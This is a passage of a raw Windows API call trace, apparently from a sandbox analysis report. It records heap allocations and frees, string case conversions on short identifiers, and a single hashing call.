(in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.560] CryptHashData (hHash=0xaa58a0, pbData=0x24b13c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0190.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0190.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0190.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0190.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0190.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.565] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cc0 [0190.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.566] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.566] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0190.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0190.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0190.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.567] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.567] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.567] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0190.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.568] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.568] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.568] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.569] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.569] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.570] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.570] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0190.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0190.571] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.571] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0190.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0190.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.573] HeapFree (in: hHeap=0x25c0000, 